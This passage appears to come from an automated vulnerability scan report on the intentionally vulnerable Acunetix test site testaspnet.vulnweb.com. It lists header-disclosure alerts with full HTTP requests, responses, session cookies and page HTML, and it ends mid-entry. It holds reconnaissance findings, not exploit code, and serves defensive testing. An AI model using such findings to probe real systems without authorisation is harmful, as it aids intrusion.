          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx+i81I" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8wYbzXe+sXxDpSfVp4SwbIP85RvA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm"
          							align="center">
          							<TR>
          								<TD>Username:</TD>
          								<TD>
          									<input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD>
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD>
          							</TR>
          						</TABLE>
          						<BR>
          						
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        17. POST http://testaspnet.vulnweb.com/about.aspx
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (397 bytes)
          POST http://testaspnet.vulnweb.com/about.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/about.aspx
          Content-Length: 1027
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1027 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t&__VIEWSTATEGENERATOR=E809BCA5&__EVENTVALIDATION=%2FwEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2F2grLtTL%2BjO092JULZB%2B%2Bks9UGJw%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 14467
          
          
          Response body (14467 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>About</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="about.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/2grLtTL+jO092JULZB++ks9UGJw==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<h1>About this website</h1>
          						<p>The website was built with the intention to test the Acunetix Web Vulnerability 
          							Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate 
          							the forementioned software's capabilities to find those bugs.</p>
          						<p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive 
          								information on this site. This includes e-mail addresses or real names.</b></p>
          						<h1>About Acunetix</h1>
          						<P><B>Combating the web vulnerability threat<BR>
          							</B>Securing a company's web applications is today's most overlooked aspect of 
          							securing the enterprise. Web application hacking is on the rise with as many as 
          							75% of cyber attacks done at web application level or via the web. Most 
          							corporations have secured their data at the network level, but have overlooked 
          							the crucial step of checking whether their web applications are vulnerable to 
          							attack. Web applications, which often have a direct line into the company's 
          							most valuable data assets, are online 24/7, completely unprotected by a 
          							firewall and therefore easy prey for attackers.</P>
          						<P>Acunetix was founded with this threat in mind. We realised the only way to 
          							combat web site hacking was to develop an automated tool that could help 
          							companies scan their web applications for vulnerabilities. In July 2005, 
          							Acunetix Web Vulnerability Scanner was released - a tool that crawls the 
          							website for vulnerabilities to SQL injection, cross site scripting and other 
          							web attacks before hackers do.</P>
          						<P>The Acunetix development team consists of highly experienced security developers 
          							who have each spent years developing network security scanning software prior 
          							to starting development on Acunetix WVS. The management team is backed by years 
          							of experience marketing and selling security software.</P>
          						<P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/">
          								offices</A> in Malta, US and the UK.
          						</P>
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        18. POST http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Content-Length: 1415
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1415 bytes)
